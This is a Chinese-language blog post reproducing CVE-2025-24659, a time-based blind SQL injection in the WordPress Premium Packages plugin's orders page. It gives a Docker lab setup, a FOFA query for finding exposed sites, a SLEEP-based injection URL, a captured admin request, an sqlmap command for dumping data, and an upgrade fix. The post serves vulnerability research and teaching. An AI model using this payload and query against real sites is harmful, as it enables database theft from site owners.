Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

admin 2025年4月23日00:15:50Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC已关闭评论21 views字数 2410阅读8分2秒阅读模式

插件介绍:

Premium Packages 是一款免费的全功能 WordPress 电子商务插件,可轻松销售数字产品。

漏洞描述:

Premium Packages - Sell Digital Products Securely plugin 5.9.6 及以下版本存在 SQL 注入漏洞。该漏洞是由于在插件仪表板的订单菜单 (/wp-admin/
edit.php?post_type=wpdmpro&page=orders)
中查看订单列表时,URL 参数 orderby 未进行充分转义造成的。

因此,拥有管理员权限的攻击者可以利用此漏洞访问目标网站数据库中存储的所有信息。

此外,虽然此 SQL 注入漏洞无法直接从响应数据中检索数据,但可以使用基于时间的盲 SQL 注入技术提取信息,该技术利用 SQL 查询中基于真/假条件的响应时间差异。

影响版本:

Premium Packages – Sell Digital Products Securely <= 5.9.6

FOFA:

body="/wp-content/plugins/wpdm-premium-packages/"

环境搭建:

使用docker 容器进行搭建,
docker-compose.yml
文件内容如下:

services:   db:     image: mysql:8.0.27     command: '--default-authentication-plugin=mysql_native_password'     restart: always     environment:       - MYSQL_ROOT_PASSWORD=somewordpress       - MYSQL_DATABASE=wordpress       - MYSQL_USER=wordpress       - MYSQL_PASSWORD=wordpress     expose:       - 3306       - 33060   wordpress:     image: wordpress:6.3.2     ports:       - 80:80     restart: always     environment:       - WORDPRESS_DB_HOST=db       - WORDPRESS_DB_USER=wordpress       - WORDPRESS_DB_PASSWORD=wordpress       - WORDPRESS_DB_NAME=wordpress volumes:   db_data:

执行如下命令,开启靶场

docker-compose up -d
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

访问目标地址,依次进行如下安装即可。

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

输入账户密码进入后台

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

下载插件,插件下载地址如下:

https://downloads.wordpress.org/plugin/wpdm-premium-packages.5.8.3.zip

这个插件可以直接安装

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

安装完成,进行激活

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

激活后提示需要插件Download Manager,下载地址如下:

https://downloads.wordpress.org/plugin/download-manager.3.3.03.zip

下载完插件,进行解压,执行如下命令将插件复制到容器中

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

启用即可

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

漏洞复现:

该漏洞利用需要管理员权限

Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

POC 如下:

http://192.168.41.163/wp-admin/

edit.php?post_type=wpdmpro&page=orders&orderby=1

 AND (SELECT 7983 FROM (SELECT(SLEEP(5)))qdHe)
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

使用burpsuite抓包,修改请求包如下,并保存为
2.txt

GET /wp-admin/

edit.php?post_type=wpdmpro&page=orders&orderby=1

 HTTP/1.1 Host: 192.168.41.163 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: wordpress_f1eea889000b4a4917f74c2cbe4e9f86=admin%7C1744940098%7CZKB4BCEAVN1jfgqf9eU3WKwu3kvrHXZMnCsrcft0kAg%7Ce17d11f423d876a87efae328fdb1fdf8f90b1f3e503fe962e52eea3d19287a6b; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_f1eea889000b4a4917f74c2cbe4e9f86=admin%7C1744940098%7CZKB4BCEAVN1jfgqf9eU3WKwu3kvrHXZMnCsrcft0kAg%7C9ee41a9342f47fb6129b1b98e5fb6ab2c0b9b19336bf4ad8a45560f39c127a5c; wp_lang=zh_CN; wp-settings-time-1=1744768424; __wpdm_client=4a09d42fd1ebd5f77aecf62a3f750422 Upgrade-Insecure-Requests: 1 Priority: u=0, i

直接使用sqlmap 跑数据

python

sqlmap.py

 -r

2.txt

 --batch
Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POC

漏洞修复:

升级至最新版

转自:
https://www.freebuf.com/articles/vuls/427747.html

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日00:15:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wordpress wpdm-premium-packages SQL注入漏洞(CVE-2025-24659) POChttps://cn-sec.com/archives/3984323.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.